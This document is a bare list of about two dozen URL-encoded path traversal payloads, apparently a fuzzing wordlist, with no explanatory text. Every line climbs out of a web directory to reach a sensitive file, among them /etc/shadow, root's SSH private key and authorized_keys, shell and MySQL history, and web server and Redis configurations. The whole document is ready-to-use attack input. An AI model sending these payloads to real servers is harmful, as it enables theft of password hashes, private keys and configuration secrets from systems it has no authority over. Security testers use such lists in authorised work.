..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F..%2Fetc%2Fmy.ini
..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fconf%2Fhttpd.conf
..%2F..%2F..%2F..%2Froot%2F.bash_history
..%2F..%2F..%2F..%2Froot%2F.mysql_history
..%2F..%2F..%2F..%2Fvar%2Flib%2Fmlocate%2Fmlocate.db
..%2F..%2F..%2F..%2Fetc%2Fssh%2Fsshd_config
..%2F..%2F..%2F..%2Fproc%2Fself%2Ffd%2Ffd1
..%2F..%2F..%2F..%2Fproc%2Fmounts
..%2F..%2F..%2F..%2Fproc%2Fconfig.gz
..%2F..%2F..%2F..%2Froot%2F.ssh%2Fauthorized_keys
..%2F..%2F..%2F..%2Froot%2F.ssh%2Fid_rsa
..%2F..%2F..%2F..%2Froot%2F.ssh%2Fid_ras.keystore
..%2F..%2F..%2F..%2Froot%2F.ssh%2Fknown_hosts
..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fconf%2Fhttpd.conf
..%2F..%2F..%2F..%2Fetc%2Fapache2%2Fhttpd.conf
..%2F..%2F..%2F..%2Fetc%2Fapache2%2Fapache2.conf
..%2F..%2F..%2F..%2Fetc%2Fnginx%2Fnginx.conf
..%2F..%2F..%2F..%2Fusr%2Flocal%2Fnginx%2Fconf%2Fnginx.conf
..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fnginx%2Fnginx.conf
..%2F..%2F..%2F..%2Fetc%2Fredis.conf
..%2F..%2F..%2F..%2Fetc%2Fredis%2Fredis.conf
..%2F..%2F..%2F..%2Fweb.xml